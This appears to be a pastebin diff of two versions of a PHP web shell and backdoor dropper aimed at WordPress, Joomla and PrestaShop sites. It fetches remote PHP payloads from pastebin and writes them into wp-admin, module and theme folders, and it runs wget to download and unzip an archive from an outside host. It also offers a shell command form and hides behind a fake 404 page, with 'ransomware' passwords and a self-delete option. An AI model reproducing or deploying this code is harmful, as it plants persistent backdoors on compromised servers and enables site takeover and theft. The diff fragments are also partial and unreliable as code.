View difference between Paste ID: eM7iB4F0 and tMJqWKD7
SHOW: | | - or go back to the newest paste.
1-
//  <================================================>
1+
2-
         $wordpress = 0; // wordpress Activité 
2+
$abcd = dirname($_SERVER["PHP_SELF"]);
3-
//  <================================================>
3+
$sexterss = $azerty.$abcd;
4-
         $wp_2 = 0; // multipart Activité 
4+
5-
//  <================================================>
5+
echo'<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL files was not found on this server.</p><h2 hidden>rotinabox@hotmail.com</h2>
6-
         $multipartdexter = 1; // multipart Activité 
6+
<p>Additionally, a 404 error Not Found was encountered while trying to use an ErrorDocument to handle the request.</p>';
7-
//  <================================================>
7+
8-
         $sexhub = 0; // Joomla & wordpress working in public_html/......
8+
9-
//  <================================================>
9+
10-
set_time_limit(0);
10+
11-
error_reporting(0);
11+
12-
echo "
12+
13-
<style>
13+
fwrite($f, $wr);fclose($f);$f = fopen('/home/'.$user.'/.contactinfo', 'w');fwrite($f, $wr); fclose($f);
14-
.myButton {
14+
if(isset($_GET['user'])){echo "<br><br><font color='red'>$user</font><br><br>";}
15-
	-moz-box-shadow:inset -1px 0px 50px 0px #fff6af;
15+
if(isset($_GET['kill'])){$a = basename($_SERVER['SCRIPT_NAME']);echo "<br><font color='blue'>GIF89a</font>";unlink($a);}
16-
	-webkit-box-shadow:inset -1px 0px 50px 0px #fff6af;
16+
17-
	background:-moz-linear-gradient(top, #ffec64 5%, #ffab23 100%);
17+
18-
	background:linear-gradient(to bottom, #ffec64 5%, #ffab23 100%);
18+
19-
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffec64', endColorstr='#ffab23',GradientType=0);
19+
20-
	background-color:#ffec64;
20+
21-
	-moz-border-radius:7px;
21+
22-
	-webkit-border-radius:7px;
22+
23-
	border-radius:7px;
23+
24-
	border:1px solid #ffaa22;
24+
25-
	display:inline-block;
25+
26-
	cursor:pointer;
26+
27-
	color:#333333;
27+
28-
	font-family:Arial;
28+
29-
	font-size:13px;
29+
30-
	padding:4px 5px;
30+
31-
	text-decoration:none;
31+
32-
	text-shadow:10px 0px 41px #ffee66;
32+
33
		@ob_end_clean(); 		
34-
</style>
34+
35-
";
35+
36-
$script = basename($_SERVER['SCRIPT_NAME']);
36+
37
		return $buff; 	
38-
$azerty = $_SERVER['SERVER_NAME'];
38+
39-
$abcd = dirname($_SERVER['PHP_SELF']) ;
39+
40-
$url = "$azerty/$abcd";
40+
$input = array('leopard','lion','male','cock','drake','penguin','quail','rat','serval','swan','bear','baboon','alpaca','zebra','yak','wolf','turkey','toad','baby','calf','cria','chick','fawn','pup','kit','nymph','swarm');
41-
echo "<link href='http://www.iconj.com/ico/g/0/g0f05tlicq.ico' rel='shortcut icon' type='image/x-icon'>
41+
$rand_keys = array_rand($input, 2);
42-
<title>Manager</title><br>
42+
$random = $input[$rand_keys[0]];
43-
<form method='POST'> 
43+
$leaf = $random;
44-
<a href='$script?ls' class='myButton'>ScanDir</a>
44+
$system = $random;
45-
<a href='$script?random' class='myButton'>Random</a>
45+
$tacos = $random;
46-
<a href='$script?kill' class='myButton' style='color: blue;'>Remove</a>
46+
if(isset($_GET['olux'])){
47-
<a href='$script?dexter' class='myButton'>Execute</a>
47+
echo "<center>";
48-
<a href='$script?presta' class='myButton'>PreSheap</a>
48+
if(eregi("get",$_GET["olux"])){
49-
<a href='$script?wordpress' class='myButton'>wordpress</a>
49+
$output = 'https://pastebin.com/raw/wL527WWg'; 
50-
<a href='$script?upload' class='myButton'>Upload</a>
50+
51-
<a href='$script?lite' class='myButton'>Shell</a>
51+
curl_setopt($st,CURLOPT_URL,$output);
52-
<a href='$script?reset' class='myButton'>Reset</a>
52+
53-
 </form>";
53+
54-
///////////////////////////////////////
54+
55-
    if($sexhub !== 1 ){}else{
55+
56-
$fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
56+
$a1=fopen('output.php','w');
57-
$xcbv = "./modules/posts.php";
57+
fwrite($a1,$html);
58-
$wxcv=fopen($xcbv,'w');
58+
$authorze = 'https://pastebin.com/raw/nxJA9qiA'; 
59-
fwrite($wxcv,$fgh);
59+
60-
$rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
60+
curl_setopt($st,CURLOPT_URL,$authorze);
61-
$jklm = "./modules/value.php";
61+
62-
$sdf=fopen($jklm,'w');
62+
63-
fwrite($sdf,$rtyu);
63+
64-
$ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
64+
65-
$uio = "./modules/links.php";
65+
$a2=fopen('authorze.php','w');
66-
$cvb=fopen($uio,'w');
66+
fwrite($a2,$html);
67-
fwrite($cvb,$ghjk);
67+
$views = 'https://pastebin.com/raw/jWBjgLd2'; 
68-
$fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
68+
69-
$xcbv = "./wp-admin/posts.php";
69+
curl_setopt($st,CURLOPT_URL,$views);
70-
$wxcv=fopen($xcbv,'w');
70+
71-
fwrite($wxcv,$fgh);
71+
72-
$rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
72+
73-
$jklm = "./wp-admin/value.php";
73+
74-
$sdf=fopen($jklm,'w');
74+
$a3=fopen('views.php','w');
75-
fwrite($sdf,$rtyu);
75+
fwrite($a3,$html);
76-
$ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
76+
echo "<a href="."http://$sexterss/authorze.php"." target="."_blank".">$sexterss/authorze.php"."</a><br>";
77-
$uio = "./wp-admin/links.php";
77+
echo "<a href="."http://$sexterss/views.php?pass=ransomware"." target="."_blank".">$sexterss/views.php?pass=ransomware"."</a><br>";
78-
$cvb=fopen($uio,'w');
78+
echo "<a href="."http://$sexterss/output.php"." target="."_blank".">$sexterss/output.php"."</a><br>";
79-
fwrite($cvb,$ghjk);
79+
80-
echo "<br><br>";
80+
81-
echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/modules/links.php"." target="."_blank".">www.$azzouz/modules/wp-links.php"."</a><br>";
81+
82-
echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/modules/wp-value.php"."</a><br>";
82+
if(eregi("mailer",$_GET["olux"])){	
83-
echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/posts.php"." target="."_blank".">www.$azzouz/modules/wp-posts.php"."</a>";
83+
84-
echo "<br><br>";
84+
85-
echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/wp-admin/links.php"." target="."_blank".">www.$azzouz/wp-admin/wp-links.php"."</a><br>";
85+
86-
echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-admin/wp-value.php"."</a><br>";
86+
$print = $path.$leaf.rand(999, 123).".php";
87-
echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/posts.php"." target="."_blank".">www.$azzouz/wp-admin/wp-posts.php"."</a>";
87+
88-
echo "<br>";
88+
89-
   }
89+
90-
///////////////////////////////////////
90+
91-
   if($wordpress !== 1 ){}else{
91+
92-
$fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
92+
93-
$xcbv = "../../../../wp-posts.php";
93+
94-
$wxcv=fopen($xcbv,'w');
94+
95-
fwrite($wxcv,$fgh);
95+
96-
$rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
96+
97-
$jklm = "../../../../wp-value.php";
97+
98-
$sdf=fopen($jklm,'w');
98+
echo "<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
99-
fwrite($sdf,$rtyu);
99+
100-
$ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
100+
101-
$uio = "../../../../wp-links.php";
101+
102-
$cvb=fopen($uio,'w');
102+
103-
fwrite($cvb,$ghjk);
103+
104-
   }
104+
$print = $path.$leaf.rand(999, 123).".php";
105-
///////////////////////////////////////
105+
106-
   if($wp_2 !== 1 ){}else{
106+
107-
$fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
107+
108-
$xcbv = "../../../wp-posts.php";
108+
109-
$wxcv=fopen($xcbv,'w');
109+
110-
fwrite($wxcv,$fgh);
110+
111-
$rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
111+
112-
$jklm = "../../../wp-value.php";
112+
113-
$sdf=fopen($jklm,'w');
113+
114-
fwrite($sdf,$rtyu);
114+
115-
$ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
115+
116-
$uio = "../../../wp-links.php";
116+
echo "<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
117-
$cvb=fopen($uio,'w');
117+
118-
fwrite($cvb,$ghjk);
118+
119-
   }
119+
120-
///////////////////////////////////////
120+
if(eregi("shell1",$_GET["olux"])){
121-
$multipart = '
121+
122-
 <html>
122+
123-
<br>
123+
124-
<div style="text-align: left;">
124+
$print = $path.$system.rand(999, 123).".php";
125-
<form  method="post" enctype="multipart/form-data">
125+
126-
<input name="cmd" value="wget http://batut.com.ua/misc/farbtastic/ms-authorze.zip" size="50" type="text"/>
126+
127-
<input value="Execute" id="Execute" type="submit"/>
127+
128-
<br></div>
128+
129-
</form>
129+
130-
<form  method="post" enctype="multipart/form-data">
130+
131-
<input name="cmd" value="unzip ms-authorze.zip" size="50" type="text"/>
131+
132-
<input value="Execute" id="Execute" type="submit"/>
132+
133-
<br></div></form>
133+
134-
<br>
134+
135-
<br>
135+
136-
<?php
136+
echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
137
break;
138-
$abcd = dirname($_SERVER["PHP_SELF"]) ;
138+
139-
$url = "$azerty/$abcd";
139+
140-
echo "<br><br>";
140+
141-
echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#0a5d00"." href="."http://$url/wp-authorze.php"." target="."_blank".">www.$url/wp-authorze.php"."</a><br>";
141+
142-
echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-views.php?pass=ransomware"." target="."_blank".">www.$url/wp-views.php"."</a><br>";
142+
$print = $path.$system.rand(999, 123).".php";
143-
echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-output.php"." target="."_blank".">www.$url/wp-output.php"."</a>";
143+
144-
echo "<br><br>";
144+
145-
if (isset($_POST["cmd"])) {
145+
146
curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
147
curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
148
$html = curl_exec($st); 
149
curl_close($st);
150
$save=fopen($print,'w');
151
fwrite($save,$html);	
152
$print = "__$print";
153
$print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
154
echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
155
}}
156
}}
157
//////
158
$p5=array("$pa/wp-content/themes/"); 
159
if(eregi("shell2",$_GET["olux"])){
160
foreach($p5 as $path){	
161
if (file_exists("$path")){
162
$print = $path.$tacos.rand(999, 123).".php";
163
$url = 'https://pastebin.com/raw/wL527WWg'; 
164
$st = curl_init();
165
curl_setopt($st,CURLOPT_URL,$url);
166
curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
167
curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
168
$html = curl_exec($st); 
169
curl_close($st);
170-
echo "<pre>".exe($_POST["cmd"])."</pre>";
170+
171-
} //Dexter Haxor ./www.fb.com/dreamdeface.org
171+
172-
?>
172+
173-
';
173+
174-
   if($multipartdexter !== 1 ){}else{
174+
echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
175-
$auth=fopen("wp-multipart.php",'w');
175+
176-
fwrite($auth,$multipart);
176+
177-
$auth2=fopen("../../wp-multipart.php",'w');
177+
178-
fwrite($auth2,$multipart);
178+
179-
$auth2=fopen("../../../wp-multipart.php",'w');
179+
180-
fwrite($auth2,$multipart);
180+
$print = $path.$tacos.rand(999, 123).".php";
181-
$auth3=fopen("../../../../wp-multipart.php",'w');
181+
182-
fwrite($auth3,$multipart);
182+
183-
   }
183+
184-
echo "<br>";
184+
185-
echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."https://$azzouz/index.php"." target="."_blank".">www.$azzouz/index.php"."</a><br>";
185+
186-
echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/wp-multipart.php"." target="."_blank".">www.$url/wp-multipart.php"."</a><br>";
186+
187-
echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$azzouz/wp-multipart.php"." target="."_blank".">www.$azzouz/wp-multipart.php"."</a><br>";
187+
188-
echo "<br>";
188+
189-
echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-posts.php"." target="."_blank".">www.$azzouz/wp-posts.php"."</a><br>";
189+
190-
echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-value.php"."</a><br>";
190+
191-
echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-links.php"." target="."_blank".">www.$azzouz/wp-links.php"."</a>";
191+
192-
echo "<br><br>";
192+
echo "<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
193-
 if(isset($_GET["wordpress"])){
193+
194
}
195
}
196
}
197
if(eregi("unzip",$_GET["olux"])){
198
exe("wget http://batut.com.ua/misc/farbtastic/ms-authorze.zip");
199-
$print = $path."cron".rand(999, 123).".php";
199+
exe("unzip ms-authorze.zip");
200-
//-------------------------------------------
200+
echo "<a href="."http://$sexterss/wp-authorze.php"." target="."_blank".">$sexterss/wp-authorze.php"."</a><br>";
201
echo "<a href="."http://$sexterss/wp-views.php?pass=ransomware"." target="."_blank".">$sexterss/wp-views.php?pass=ransomware"."</a><br>";
202
echo "<a href="."http://$sexterss/wp-output.php"." target="."_blank".">$sexterss/wp-output.php"."</a><br>";
203
unlink("ms-authorze.zip");
204
echo "</center>";
205
}
206
}